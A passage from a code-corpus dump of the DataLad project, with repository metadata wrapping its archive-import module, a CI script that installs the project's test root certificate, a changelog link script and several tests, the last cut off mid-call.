assign_expr = re.compile(r'[^\\s]+\\.[^\\s]+=[\\S]+')\n unset_expr = re.compile(r':[^\\s]+\\.[^\\s=]+')\n noassign = [\n o\n for o in cmdlineargs.cfg_overrides\n if not (assign_expr.match(o) or unset_expr.match(o))\n ]\n if noassign:\n lgr.error(\n \"Configuration override without section/variable \"\n \"or unset marker or value assignment \"\n \"(must be '(:section.variable|section.variable=value)'): %s\",\n noassign)\n sys.exit(3)\n overrides = dict(\n [o[1:], None] if o.startswith(':')\n else o.split('=', 1)\n for o in cmdlineargs.cfg_overrides\n )\n return overrides\n" }, { "alpha_fraction": 0.5134968757629395, "alphanum_fraction": 0.5148270726203918, "avg_line_length": 42.22861099243164, "blob_id": "3eb5ff40aa453fb77bd1453589bc914473bf3886", "content_id": "a75152d2b1a872a927ded8f25dc60d27c71c45c3", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30822, "license_type": "permissive", "max_line_length": 184, "num_lines": 713, "path": "/datalad/local/add_archive_content.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for adding content of an archive under annex control\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport os\nimport re\nimport tempfile\nimport warnings\nfrom os.path import (\n basename,\n curdir,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import lexists\nfrom os.path import sep as opsep\n\nfrom datalad.consts import ARCHIVES_SPECIAL_REMOTE\nfrom datalad.customremotes.base import ensure_datalad_remote\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import allow_dirty\nfrom datalad.interface.results import get_status_dict\nfrom datalad.log import (\n log_progress,\n logging,\n)\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import (\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.stats import ActivityStats\nfrom datalad.support.strings import apply_replacement_rules\nfrom datalad.utils import (\n Path,\n ensure_tuple_or_list,\n file_basename,\n getpwd,\n md5sum,\n rmtree,\n split_cmdline,\n)\n\nlgr = logging.getLogger('datalad.local.add_archive_content')\n\n\n# Shortcut note\n_KEY_OPT = \"[PY: `key=True` PY][CMD: --key CMD]\"\n_KEY_OPT_NOTE = \"Note that it will be of no effect if %s is given\" % _KEY_OPT\n\n# TODO: may be we could enable separate logging or add a flag to enable\n# all but by default to print only the one associated with this given action\n\n\n@build_doc\nclass AddArchiveContent(Interface):\n \"\"\"Add content of an archive under git annex control.\n\n Given an already annex'ed archive, extract and add its files to the\n dataset, and reference the original archive as a custom special remote.\n\n \"\"\"\n _examples_ = [\n dict(text=\"\"\"Add files from the archive 'big_tarball.tar.gz', but\n keep 
big_tarball.tar.gz in the index\"\"\",\n code_py=\"add_archive_content(path='big_tarball.tar.gz')\",\n code_cmd=\"datalad add-archive-content big_tarball.tar.gz\"),\n dict(text=\"\"\"Add files from the archive 'tarball.tar.gz', and\n remove big_tarball.tar.gz from the index\"\"\",\n code_py=\"add_archive_content(path='big_tarball.tar.gz', delete=True)\",\n code_cmd=\"datalad add-archive-content big_tarball.tar.gz --delete\"),\n dict(text=\"\"\"Add files from the archive 's3.zip' but remove the leading\n directory\"\"\",\n code_py=\"add_archive_content(path='s3.zip', strip_leading_dirs=True)\",\n code_cmd=\"datalad add-archive-content s3.zip --strip-leading-dirs\"),\n ]\n\n # XXX prevent common args from being added to the docstring\n _no_eval_results = True\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to save\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n delete=Parameter(\n args=(\"-D\", \"--delete\"),\n action=\"store_true\",\n doc=\"\"\"delete original archive from the filesystem/Git in current\n tree. %s\"\"\" % _KEY_OPT_NOTE),\n add_archive_leading_dir=Parameter(\n args=(\"--add-archive-leading-dir\",),\n action=\"store_true\",\n doc=\"\"\"place extracted content under a directory which would\n correspond to the archive name with all suffixes stripped. E.g. the\n content of `archive.tar.gz` will be extracted under `archive/`\"\"\"),\n strip_leading_dirs=Parameter(\n args=(\"--strip-leading-dirs\",),\n action=\"store_true\",\n doc=\"\"\"remove one or more leading directories from the archive\n layout on extraction\"\"\"),\n leading_dirs_depth=Parameter(\n args=(\"--leading-dirs-depth\",),\n action=\"store\",\n type=int,\n doc=\"\"\"maximum depth of leading directories to strip.\n If not specified (None), no limit\"\"\"),\n leading_dirs_consider=Parameter(\n args=(\"--leading-dirs-consider\",),\n action=\"append\",\n doc=\"\"\"regular expression(s) for directories to consider to strip\n away\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n ),\n use_current_dir=Parameter(\n args=(\"--use-current-dir\",),\n action=\"store_true\",\n doc=\"\"\"extract the archive under the current directory, not the\n directory where the archive is located. This parameter is applied\n automatically if [PY: `key=True` PY][CMD: --key CMD] was used.\"\"\"),\n # TODO: add option to extract under archive's original directory. Currently would extract in curdir\n existing=Parameter(\n args=(\"--existing\",),\n choices=('fail', 'overwrite', 'archive-suffix', 'numeric-suffix'),\n default=\"fail\",\n doc=\"\"\"what operation to perform if a file from an archive tries to\n overwrite an existing file with the same name. 'fail' (default)\n leads to an error result, 'overwrite' silently replaces\n existing file, 'archive-suffix' instructs to add a suffix (prefixed\n with a '-') matching archive name from which file gets extracted,\n and if that one is present as well, 'numeric-suffix' is in effect in\n addition, when incremental numeric suffix (prefixed with a '.') is\n added until no name collision is longer detected\"\"\"\n ),\n exclude=Parameter(\n args=(\"-e\", \"--exclude\"),\n action='append',\n doc=\"\"\"regular expressions for filenames which to exclude from being\n added to annex. 
Applied after --rename if that one is specified.\n For exact matching, use anchoring\"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n rename=Parameter(\n args=(\"-r\", \"--rename\"),\n action='append',\n doc=\"\"\"regular expressions to rename files before added them under\n to Git. The first defines how to split provided string into\n two parts: Python regular expression (with groups), and replacement\n string\"\"\",\n constraints=EnsureStr(min_len=2) | EnsureNone()\n ),\n annex_options=Parameter(\n args=(\"-o\", \"--annex-options\"),\n doc=\"\"\"additional options to pass to git-annex \"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n annex=Parameter(\n doc=\"\"\"DEPRECATED. Use the 'dataset' parameter instead.\"\"\"\n ),\n # TODO: Python only!\n stats=Parameter(\n doc=\"\"\"ActivityStats instance for global tracking\"\"\",\n ),\n key=Parameter(\n args=(\"--key\",),\n action=\"store_true\",\n doc=\"\"\"signal if provided archive is not actually a filename on its\n own but an annex key. The archive will be extracted in the current\n directory.\"\"\"),\n copy=Parameter(\n args=(\"--copy\",),\n action=\"store_true\",\n doc=\"\"\"copy the content of the archive instead of moving\"\"\"),\n allow_dirty=allow_dirty,\n commit=Parameter(\n args=(\"--no-commit\",),\n action=\"store_false\",\n dest=\"commit\",\n doc=\"\"\"don't commit upon completion\"\"\"),\n drop_after=Parameter(\n args=(\"--drop-after\",),\n action=\"store_true\",\n doc=\"\"\"drop extracted files after adding to annex\"\"\",\n ),\n delete_after=Parameter(\n args=(\"--delete-after\",),\n action=\"store_true\",\n doc=\"\"\"extract under a temporary directory, git-annex add, and\n delete afterwards. To be used to \"index\" files within annex without\n actually creating corresponding files under git. Note that\n `annex dropunused` would later remove that load\"\"\"),\n\n # TODO: interaction with archives cache whenever we make it persistent across runs\n archive=Parameter(\n args=(\"archive\",),\n doc=\"archive file or a key (if %s specified)\" % _KEY_OPT,\n constraints=EnsureStr()),\n )\n\n @staticmethod\n @datasetmethod(name='add_archive_content')\n @eval_results\n def __call__(\n archive,\n *,\n dataset=None,\n annex=None,\n add_archive_leading_dir=False,\n strip_leading_dirs=False,\n leading_dirs_depth=None,\n leading_dirs_consider=None,\n use_current_dir=False,\n delete=False,\n key=False,\n exclude=None,\n rename=None,\n existing='fail',\n annex_options=None,\n copy=False,\n commit=True,\n allow_dirty=False,\n stats=None,\n drop_after=False,\n delete_after=False):\n\n if exclude:\n exclude = ensure_tuple_or_list(exclude)\n if rename:\n rename = ensure_tuple_or_list(rename)\n ds = require_dataset(dataset,\n check_installed=True,\n purpose='add-archive-content')\n\n # set up common params for result records\n res_kwargs = {\n 'action': 'add-archive-content',\n 'logger': lgr,\n }\n\n if not isinstance(ds.repo, AnnexRepo):\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=\"Can't operate in a pure Git repository\",\n **res_kwargs\n )\n return\n if annex:\n warnings.warn(\n \"datalad add_archive_content's `annex` parameter is \"\n \"deprecated and will be removed in a future release. 
\"\n \"Use the 'dataset' parameter instead.\",\n DeprecationWarning)\n annex = ds.repo\n # get the archive path relative from the ds root\n archive_path = resolve_path(archive, ds=dataset)\n # let Status decide whether we can act on the given file\n for s in ds.status(\n path=archive_path,\n on_failure='ignore',\n result_renderer='disabled'):\n if s['status'] == 'error':\n if 'path not underneath the reference dataset %s' in s['message']:\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message='Can not add archive outside of the dataset',\n **res_kwargs)\n return\n # status errored & we haven't anticipated the cause. Bubble up\n yield s\n return\n elif s['state'] == 'untracked':\n # we can't act on an untracked file\n message = (\n \"Can not add an untracked archive. \"\n \"Run 'datalad save {}'\".format(archive)\n )\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=message,\n **res_kwargs)\n return\n\n if not allow_dirty and annex.dirty:\n # error out here if the dataset contains untracked changes\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=(\n 'clean dataset required. '\n 'Use `datalad status` to inspect unsaved changes'),\n **res_kwargs\n )\n return\n\n # ensure the archive exists, status doesn't error on a non-existing file\n if not key and not lexists(archive_path):\n yield get_status_dict(\n ds=ds,\n status='impossible',\n message=(\n 'No such file: {}'.format(archive_path),\n ),\n **res_kwargs\n )\n return\n\n if not key:\n check_path = archive_path.relative_to(ds.pathobj)\n # TODO: support adding archives content from outside the annex/repo\n origin = 'archive'\n # can become get_file_annexinfo once #6104 is merged\n key = annex.get_file_annexinfo(check_path)['key']\n if not key:\n raise RuntimeError(\n f\"Archive must be an annexed file in {ds}\")\n archive_dir = Path(archive_path).parent\n else:\n origin = 'key'\n key = archive\n # We must not have anything to do with the location under .git/annex\n archive_dir = None\n # instead, we will go from the current directory\n use_current_dir = True\n\n archive_basename = file_basename(archive)\n\n if not key:\n # if we didn't manage to get a key, the file must be in Git\n raise NotImplementedError(\n \"Provided file %s does not seem to be under annex control. \"\n \"We don't support adding everything straight to Git\" % archive\n )\n\n # figure out our location\n pwd = getpwd()\n # are we in a subdirectory of the repository?\n pwd_in_root = annex.path == archive_dir\n # then we should add content under that subdirectory,\n # get the path relative to the repo top\n if use_current_dir:\n # extract the archive under the current directory, not the directory\n # where the archive is located\n extract_rpath = Path(pwd).relative_to(ds.path) \\\n if not pwd_in_root \\\n else None\n else:\n extract_rpath = archive_dir.relative_to(ds.path)\n\n # relpath might return '.' as the relative path to curdir, which then normalize_paths\n # would take as instructions to really go from cwd, so we need to sanitize\n if extract_rpath == curdir:\n extract_rpath = None\n\n try:\n key_rpath = annex.get_contentlocation(key)\n except:\n # the only probable reason for this to fail is that there is no\n # content present\n raise RuntimeError(\n \"Content of %s seems to be N/A. 
Fetch it first\" % key\n )\n\n # now we simply need to go through every file in that archive and\n lgr.info(\n \"Adding content of the archive %s into annex %s\", archive, annex\n )\n\n from datalad.customremotes.archives import ArchiveAnnexCustomRemote\n\n # TODO: shouldn't we be able just to pass existing AnnexRepo instance?\n # TODO: we will use persistent cache so we could just (ab)use possibly extracted archive\n # OK, let's ignore that the following class is actually a special\n # remote implementation, and use it only to work with its cache\n annexarchive = ArchiveAnnexCustomRemote(annex=None,\n path=annex.path,\n persistent_cache=True)\n # We will move extracted content so it must not exist prior running\n annexarchive.cache.allow_existing = True\n earchive = annexarchive.cache[key_rpath]\n # make sure there is an enabled datalad-archives special remote\n ensure_datalad_remote(ds.repo, remote=ARCHIVES_SPECIAL_REMOTE,\n autoenable=True)\n\n precommitted = False\n old_always_commit = annex.always_commit\n # batch mode is disabled when faking dates, we want to always commit\n annex.always_commit = annex.fake_dates_enabled\n if annex_options:\n if isinstance(annex_options, str):\n annex_options = split_cmdline(annex_options)\n delete_after_rpath = None\n\n prefix_dir = basename(tempfile.mkdtemp(prefix=\".datalad\",\n dir=annex.path)) \\\n if delete_after \\\n else None\n\n # dedicated stats which would be added to passed in (if any)\n outside_stats = stats\n stats = ActivityStats()\n\n # start a progress bar for extraction\n pbar_id = f'add-archive-{archive_path}'\n try:\n # keep track of extracted files for progress bar logging\n file_counter = 0\n # iterative over all files in the archive\n extracted_files = list(earchive.get_extracted_files())\n log_progress(\n lgr.info, pbar_id, 'Extracting archive',\n label=\"Extracting archive\",\n unit=' Files',\n total = len(extracted_files),\n noninteractive_level = logging.INFO)\n for extracted_file in extracted_files:\n file_counter += 1\n files_left = len(extracted_files) - file_counter\n log_progress(\n lgr.info, pbar_id,\n \"Files to extract %i \", files_left,\n update=1,\n increment=True,\n noninteractive_level=logging.DEBUG)\n stats.files += 1\n extracted_path = Path(earchive.path) / Path(extracted_file)\n\n if extracted_path.is_symlink():\n link_path = str(extracted_path.resolve())\n if not exists(link_path):\n # TODO: config addarchive.symlink-broken='skip'\n lgr.warning(\n \"Path %s points to non-existing file %s\" %\n (extracted_path, link_path)\n )\n stats.skipped += 1\n continue\n # TODO: check if points outside of archive - warn & skip\n\n url = annexarchive.get_file_url(\n archive_key=key,\n file=extracted_file,\n size=os.stat(extracted_path).st_size)\n\n # preliminary target name which might get modified by renames\n target_file_orig = target_file = Path(extracted_file)\n\n # stream archives would not have had the original filename\n # information in them, so would be extracted under a name\n # derived from their annex key.\n # Provide ad-hoc handling for such cases\n if (len(extracted_files) == 1 and\n Path(archive).suffix in ('.xz', '.gz', '.lzma') and\n Path(key_rpath).name.startswith(Path(\n extracted_file).name)):\n # take archive's name without extension for filename & place\n # where it was originally extracted\n target_file = \\\n Path(extracted_file).parent / Path(archive).stem\n\n if strip_leading_dirs:\n leading_dir = earchive.get_leading_directory(\n depth=leading_dirs_depth, exclude=exclude,\n 
consider=leading_dirs_consider)\n leading_dir_len = \\\n len(leading_dir) + len(opsep) if leading_dir else 0\n target_file = str(target_file)[leading_dir_len:]\n\n if add_archive_leading_dir:\n # place extracted content under a directory corresponding to\n # the archive name with suffix stripped.\n target_file = Path(archive_basename) / target_file\n\n if rename:\n target_file = apply_replacement_rules(rename,\n str(target_file))\n\n # continue to next iteration if extracted_file in excluded\n if exclude:\n try: # since we need to skip outside loop from inside loop\n for regexp in exclude:\n if re.search(regexp, extracted_file):\n lgr.debug(\n \"Skipping %s since contains %s pattern\",\n extracted_file, regexp)\n stats.skipped += 1\n raise StopIteration\n except StopIteration:\n continue\n\n if delete_after:\n # place target file in a temporary directory\n target_file = Path(prefix_dir) / Path(target_file)\n # but also allow for it in the orig\n target_file_orig = Path(prefix_dir) / Path(target_file_orig)\n\n target_file_path_orig = annex.pathobj / target_file_orig\n\n # If we were invoked in a subdirectory, patch together the\n # correct path\n target_file_path = extract_rpath / target_file \\\n if extract_rpath else target_file\n target_file_path = annex.pathobj / target_file_path\n\n # when the file already exists...\n if lexists(target_file_path):\n handle_existing = True\n if md5sum(str(target_file_path)) == \\\n md5sum(str(extracted_path)):\n if not annex.is_under_annex(str(extracted_path)):\n # if under annex -- must be having the same content,\n # we should just add possibly a new extra URL\n # but if under git -- we cannot/should not do\n # anything about it ATM\n if existing != 'overwrite':\n continue\n else:\n handle_existing = False\n if not handle_existing:\n pass # nothing... just to avoid additional indentation\n elif existing == 'fail':\n message = \\\n \"{} exists, but would be overwritten by new file \" \\\n \"{}. Consider adjusting --existing\".format\\\n (target_file_path, extracted_file)\n yield get_status_dict(\n ds=ds,\n status='error',\n message=message,\n **res_kwargs)\n return\n elif existing == 'overwrite':\n stats.overwritten += 1\n # to make sure it doesn't conflict -- might have been a\n # tree\n rmtree(target_file_path)\n else:\n # an elaborate dance to piece together new archive names\n target_file_path_orig_ = target_file_path\n\n # To keep extension intact -- operate on the base of the\n # filename\n p, fn = os.path.split(target_file_path)\n ends_with_dot = fn.endswith('.')\n fn_base, fn_ext = file_basename(fn, return_ext=True)\n\n if existing == 'archive-suffix':\n fn_base += '-%s' % archive_basename\n elif existing == 'numeric-suffix':\n pass # archive-suffix will have the same logic\n else:\n # we shouldn't get here, argparse should catch a\n # non-existing value for --existing right away\n raise ValueError(existing)\n # keep incrementing index in the suffix until file\n # doesn't collide\n suf, i = '', 0\n while True:\n connector = \\\n ('.' if (fn_ext or ends_with_dot) else '')\n file = fn_base + suf + connector + fn_ext\n target_file_path_new = \\\n Path(p) / Path(file)\n if not lexists(target_file_path_new):\n # we found a file name that is not yet taken\n break\n lgr.debug(\"Iteration %i of file name finding. 
\"\n \"File %s already exists\", i,\n target_file_path_new)\n i += 1\n suf = '.%d' % i\n target_file_path = target_file_path_new\n lgr.debug(\"Original file %s will be saved into %s\"\n % (target_file_path_orig_, target_file_path))\n # TODO: should we reserve smth like\n # stats.clobbed += 1\n\n if target_file_path != target_file_path_orig:\n stats.renamed += 1\n\n if copy:\n raise NotImplementedError(\n \"Not yet copying from 'persistent' cache\"\n )\n\n lgr.debug(\"Adding %s to annex pointing to %s and with options \"\n \"%r\", target_file_path, url, annex_options)\n\n out_json = annex.add_url_to_file(\n target_file_path,\n url, options=annex_options,\n batch=True)\n\n if 'key' in out_json and out_json['key'] is not None:\n # annex.is_under_annex(target_file, batch=True):\n # due to http://git-annex.branchable.com/bugs/annex_drop_is_not___34__in_effect__34___for_load_which_was___34__addurl_--batch__34__ed_but_not_yet_committed/?updated\n # we need to maintain a list of those to be dropped files\n if drop_after:\n # drop extracted files after adding to annex\n annex.drop_key(out_json['key'], batch=True)\n stats.dropped += 1\n stats.add_annex += 1\n else:\n lgr.debug(\"File %s was added to git, not adding url\",\n target_file_path)\n stats.add_git += 1\n\n if delete_after:\n # we count the removal here, but don't yet perform it\n # to not interfere with batched processes - any pure Git\n # action invokes precommit which closes batched processes.\n stats.removed += 1\n\n # Done with target_file -- just to have clear end of the loop\n del target_file\n\n if delete and archive and origin != 'key':\n lgr.debug(\"Removing the original archive %s\", archive)\n # force=True since some times might still be staged and fail\n annex.remove(str(archive_path), force=True)\n\n lgr.info(\"Finished adding %s: %s\", archive, stats.as_str(mode='line'))\n\n if outside_stats:\n outside_stats += stats\n if delete_after:\n # force since not committed. r=True for -r (passed into git call\n # to recurse)\n delete_after_rpath = opj(extract_rpath, prefix_dir) \\\n if extract_rpath else prefix_dir\n delete_after_rpath = resolve_path(delete_after_rpath,\n ds=dataset)\n lgr.debug(\n \"Removing extracted and annexed files under %s\",\n delete_after_rpath\n )\n annex.remove(str(delete_after_rpath), r=True, force=True)\n if commit:\n archive_rpath = archive_path.relative_to(ds.path)\n commit_stats = outside_stats if outside_stats else stats\n # so batched ones close and files become annex symlinks etc\n annex.precommit()\n precommitted = True\n if any(r.get('state', None) != 'clean'\n for p, r in annex.status(untracked='no').items()):\n annex.commit(\n \"Added content extracted from %s %s\\n\\n%s\" %\n (origin, archive_rpath,\n commit_stats.as_str(mode='full')),\n _datalad_msg=True\n )\n commit_stats.reset()\n else:\n # don't commit upon completion\n pass\n finally:\n # take down the progress bar\n log_progress(\n lgr.info, pbar_id,\n 'Finished extraction',\n noninteractive_level=logging.INFO)\n # since we batched addurl, we should close those batched processes\n # if haven't done yet. 
explicitly checked to avoid any possible\n # \"double-action\"\n if not precommitted:\n annex.precommit()\n\n if delete_after_rpath:\n delete_after_path = opj(annex.path, delete_after_rpath)\n delete_after_rpath = resolve_path(delete_after_rpath,\n ds=dataset)\n if exists(delete_after_path): # should not be there\n # but for paranoid yoh\n lgr.warning(\n \"Removing temporary directory under which extracted \"\n \"files were annexed and should have been removed: %s\",\n delete_after_path)\n rmtree(delete_after_path)\n\n annex.always_commit = old_always_commit\n # remove what is left and/or everything upon failure\n earchive.clean(force=True)\n # remove tempfile directories (not cleaned up automatically):\n if prefix_dir is not None and lexists(prefix_dir):\n os.rmdir(prefix_dir)\n yield get_status_dict(\n ds=ds,\n status='ok',\n **res_kwargs)\n return annex\n" }, { "alpha_fraction": 0.7625698447227478, "alphanum_fraction": 0.7625698447227478, "avg_line_length": 38.77777862548828, "blob_id": "724b67f6df2b0026db74a40e884506341e48a954", "content_id": "4b55d2fa694b3a9da0a4673172950e2fa921e7f1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 358, "license_type": "permissive", "max_line_length": 90, "num_lines": 9, "path": "/tools/ci/deploy_datalad-rootca", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# deploy the root CA that comes with the sources in order to be able to test\n# against the internal HTTPS server without fiddling\n\nif hash update-ca-certificates; then\n sudo mkdir -p /usr/local/share/ca-certificates/\n sudo cp datalad/tests/ca/ca-root.pem /usr/local/share/ca-certificates/datalad-root.crt\n sudo update-ca-certificates\nfi\n" }, { "alpha_fraction": 0.5781659483909607, "alphanum_fraction": 0.5882096290588379, "avg_line_length": 24.44444465637207, "blob_id": "95e9e2af2c10bfc5eee62f89e14e86511a795303", "content_id": "c40d77cc7844ffdb5caa3067898fcc7178ee2b5f", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "permissive", "max_line_length": 137, "num_lines": 90, "path": "/datalad/local/tests/test_add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test add_readme\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_repo_status,\n assert_status,\n known_failure_githubci_win,\n ok_startswith,\n with_tree,\n)\n\n_ds_template = {\n '.datalad': {\n 'config': '''\\\n[datalad \"metadata\"]\n nativetype = frictionless_datapackage\n'''},\n 'datapackage.json': '''\\\n{\n \"title\": \"demo_ds\",\n \"description\": \"this is for play\",\n \"license\": \"PDDL\",\n \"author\": [\n \"Betty\",\n \"Tom\"\n ]\n}\n'''}\n\n\n@known_failure_githubci_win # fails since upgrade to 8.20200226-g2d3ef2c07\n@with_tree(_ds_template)\ndef test_add_readme(path=None):\n ds = 
Dataset(path).create(force=True)\n ds.save()\n if False:\n # TODO make conditional on the presence of datalad-deprecated\n ds.aggregate_metadata()\n assert_repo_status(ds.path)\n assert_status('ok', ds.add_readme())\n # should use default name\n content = open(opj(path, 'README.md')).read()\n if False:\n # TODO make conditional on the presence of datalad-deprecated\n ok_startswith(\n content,\n \"\"\"\\\n# Dataset \"demo_ds\"\n\nthis is for play\n\n### Authors\n\n- Betty\n- Tom\n\n### License\n\nPDDL\n\n## General information\n\nThis is a DataLad dataset (id: {id}).\n\"\"\".format(\n id=ds.id))\n # make sure that central README references are present\n assert_in(\n \"\"\"More information on how to install DataLad and [how to install](http://handbook.datalad.org/en/latest/intro/installation.html)\nit can be found in the [DataLad Handbook](https://handbook.datalad.org/en/latest/index.html).\n\"\"\",\n content\n )\n # no unexpectedly long lines\n assert all([len(l) < 160 for l in content.splitlines()])\n\n # should skip on re-run\n assert_status('notneeded', ds.add_readme())\n" }, { "alpha_fraction": 0.5033556818962097, "alphanum_fraction": 0.5167785286903381, "avg_line_length": 28.799999237060547, "blob_id": "6187d925094901b60f42dda5ed80582933f6f29b", "content_id": "1cbf72de9c19b20eade75e62c16829658d0e72a5", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 447, "license_type": "permissive", "max_line_length": 101, "num_lines": 15, "path": "/tools/link_issues_CHANGELOG", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nin=CHANGELOG.md\n\n# Replace them with Markdown references\nsed -i -e 's/(\\(#[0-9]\\+\\))/([\\1][])/g' \"$in\"\n\n# Populate references\ntr ' ,' '\\n\\n' < \"$in\" | sponge | sed -n -e 's/.*(\\[#\\([0-9]\\+\\)\\]\\(\\[\\]*\\)).*/\\1/gp' | sort | uniq \\\n| while read issue; do\n #echo \"issue $issue\"\n # remove old one if exists\n sed -i -e \"/^\\[#$issue\\]:.*/d\" \"$in\"\n echo \"[#$issue]: https://github.com/datalad/datalad/issues/$issue\" >> \"$in\";\ndone\n" }, { "alpha_fraction": 0.627322256565094, "alphanum_fraction": 0.6347535848617554, "avg_line_length": 39.05793380737305, "blob_id": "dff79d65236a05580205ad333f6a06f5592fed6e", "content_id": "befcd40778ce8241e17d1fdd663d140ac43a7601", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44945, "license_type": "permissive", "max_line_length": 96, "num_lines": 1122, "path": "/datalad/distribution/tests/test_update.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test update action\n\n\"\"\"\n\nimport os\nimport os.path as op\nfrom os.path import exists\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import (\n clone,\n install,\n remove,\n update,\n)\nfrom datalad.distribution.update import _process_how_args\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n 
DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_is_instance,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n known_failure_windows,\n maybe_adjust_repo,\n neq_,\n ok_,\n ok_file_has_content,\n skip_if_adjusted_branch,\n slow,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n knows_annex,\n rmtree,\n)\n\nfrom ..dataset import Dataset\n\n\n@slow\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_update_simple(origin=None, src_path=None, dst_path=None):\n ca = dict(result_renderer='disabled')\n # a remote dataset with a subdataset underneath\n origds = Dataset(origin).create(**ca)\n # naming is weird, but a legacy artifact\n _ = origds.create('subm 1', **ca)\n _ = origds.create('2', **ca)\n\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n # forget we cloned it by removing remote, which should lead to\n # setting tracking branch to target:\n source.repo.remove_remote(DEFAULT_REMOTE)\n # also forget the declared absolute location of the submodules, and turn them\n # relative to this/a clone\n for sub in source.subdatasets(result_xfm=lambda x: x['gitmodule_name']):\n source.subdatasets(path=sub, set_property=[('url', './{}'.format(sub))])\n\n # dataset without sibling will not need updates\n assert_status('notneeded', source.update())\n # deprecation message doesn't ruin things\n assert_status('notneeded', source.update(fetch_all=True))\n # but error if unknown sibling is given\n assert_status('impossible', source.update(sibling='funky', on_failure='ignore'))\n\n # get a clone to update later on:\n dest = install(dst_path, source=src_path, recursive=True)\n # test setup done;\n # assert all fine\n assert_repo_status(dst_path)\n assert_repo_status(src_path)\n\n # update yields nothing => up-to-date\n assert_status('ok', dest.update())\n assert_repo_status(dst_path)\n\n # modify remote:\n with open(opj(src_path, \"update.txt\"), \"w\") as f:\n f.write(\"Additional content\")\n source.save(path=\"update.txt\", message=\"Added update.txt\")\n assert_repo_status(src_path)\n\n # update without `merge` only fetches:\n assert_status('ok', dest.update())\n # modification is not known to active branch:\n assert_not_in(\"update.txt\",\n dest.repo.get_files(dest.repo.get_active_branch()))\n # modification is known to branch <default remote>/<default branch>\n assert_in(\"update.txt\",\n dest.repo.get_files(DEFAULT_REMOTE + \"/\" + DEFAULT_BRANCH))\n\n # merge:\n assert_status('ok', dest.update(merge=True))\n # modification is now known to active branch:\n assert_in(\"update.txt\",\n dest.repo.get_files(dest.repo.get_active_branch()))\n # it's known to annex, but has no content yet:\n annexprops = dest.repo.get_file_annexinfo(\"update.txt\",\n eval_availability=True)\n annexprops['key'] # blows if unknown\n eq_(False, annexprops['has_content'])\n\n # check subdataset path constraints, baseline (parent + 2 subds)\n assert_result_count(dest.update(recursive=True),\n 3, status='ok', type='dataset')\n # no recursion and invalid path still updates the parent\n res = dest.update(path='whatever')\n assert_result_count(res, 1, status='ok', type='dataset')\n assert_result_count(res, 1, status='ok', path=dest.path)\n # invalid path with recursion also does\n res = dest.update(recursive=True, 